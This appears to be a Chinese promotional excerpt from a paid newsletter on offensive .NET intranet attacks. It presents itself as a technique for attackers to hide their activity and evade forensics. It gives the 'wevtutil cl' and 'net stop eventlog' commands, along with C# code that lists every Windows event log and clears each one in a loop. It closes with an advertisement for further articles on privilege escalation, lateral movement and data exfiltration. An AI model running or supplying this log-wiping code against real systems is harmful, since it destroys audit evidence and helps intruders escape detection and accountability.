本文内容部分节选自小报童《.NET 通过调用wevtutil进程实现痕迹清理》，完整的文章内容请加入小报童后订阅查看。现在限时只需59元，永久买断！目前已有280+位朋友抢先预定，我们会长期更新，对.NET内网安全的朋友们请尽快订阅该报刊！

在渗透测试或攻击活动中，清理日志是一项关键的操作，用于掩盖攻击者的行为，避免被防御者发现和追踪。通过 .NET 程序调用 wevtutil 命令，可以高效地清空所有的系统日志，这种方法具有较强的隐蔽性，能够绕过大部分传统的日志分析工具，为攻击者提供了一种强有力的反取证手段。

3.1 事件日志服务

Windows 事件日志服务，英文名为：Windows Event Log，对应的进程是 svchost.exe，多个系统服务可以共享一个或多个 svchost.exe 进程。事件日志服务可以通过任务管理器进行查看，具体操作步骤如下：

由于，eventlog 服务是 Windows 系统的核心服务，建议始终保持启用状态，但在执行日志审计、故障排查或监控任务时往往需要暂停或者重启该服务，可以通过以下命令实现。

 
net start eventlog
net stop eventlog

3.2 事件查看器

事件查看器是 Windows 操作系统内置的一个强大图形化工具，用于查看、筛选、分析和管理事件日志。按 Win + R 键，输入 eventvwr，即可打开工具界面，如下图所示。

通过事件筛选功能，右键某个日志 → 筛选当前日志，在弹出的窗口中设置筛选条件，如下图所示。

3.3 痕迹清理编码实现

wevtutil.exe 命令的 cl 参数用于清空指定的事件日志，比如要清空 Application 日志，可以使用以下命令：

 
wevtutil.exe cl Application

因此，我们可以用.NET启动 wevtutil.exe 进程，传入el 和 cl 两个参数分别读取事件名称和清理的动作，具体代码如下所示。

 
List<String> eventLogs = _Start_Process("wevtutil.exe", "el")
    .Split(new string[] { "\r\n" }, StringSplitOptions.RemoveEmptyEntries)
    .ToList();

随后，遍历 eventLogs 集合，该集合包含系统中的所有事件日志名称 如 "Application", "Security", "System" 等，具体代码如下所示

 
foreach (String item in eventLogs)
{

    Console.WriteLine("Cleaning Log " + item + "\r\n");
    Console.WriteLine(_Start_Process("wevtutil.exe", "cl " + item) + "..\r\n");
    System.Threading.Thread.Sleep(50);
}

综上，通过使用 .NET 程序结合 wevtutil 工具清空 Windows 日志，攻击者可以有效掩盖操作痕迹，从而大幅降低攻击活动被发现的概率。想要了解完整或者更多的内网安全方向的文章，可以移步订阅小报童《.NET 内网实战攻防》电子报刊。

本次电子报刊《.NET 内网安全攻防》专栏，内容主要有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧，可细分为以下8个方向。

1） .NET 安全防御绕过
2） .NET 本地权限提升
3） .NET 内网信息收集
4） .NET 内网代理通道
5） .NET 内网横向移动
6） .NET 目标权限维持
7） .NET 数据传输外发
8） .NET 目标痕迹清理

原价899，现在限时只需59元，永久买断！目前已有280+位朋友抢先预定，我们会长期更新，初步计划保持每周更新1-2篇新内容，对.NET内网安全的朋友们请尽快订阅该报刊！

每增加五十人涨价10元，抓紧订阅，超值！订阅后请关注公众号：dotNet安全矩阵，发送订单截图和您的微信号，邀请您加入专属交流群。感兴趣的朋友，可以点击链接：https://xiaobot.net/p/dotNetAttack，或者扫描下方海报微信二维码加入即可，订阅后小报童定时会将最新内容通过微信推送给您。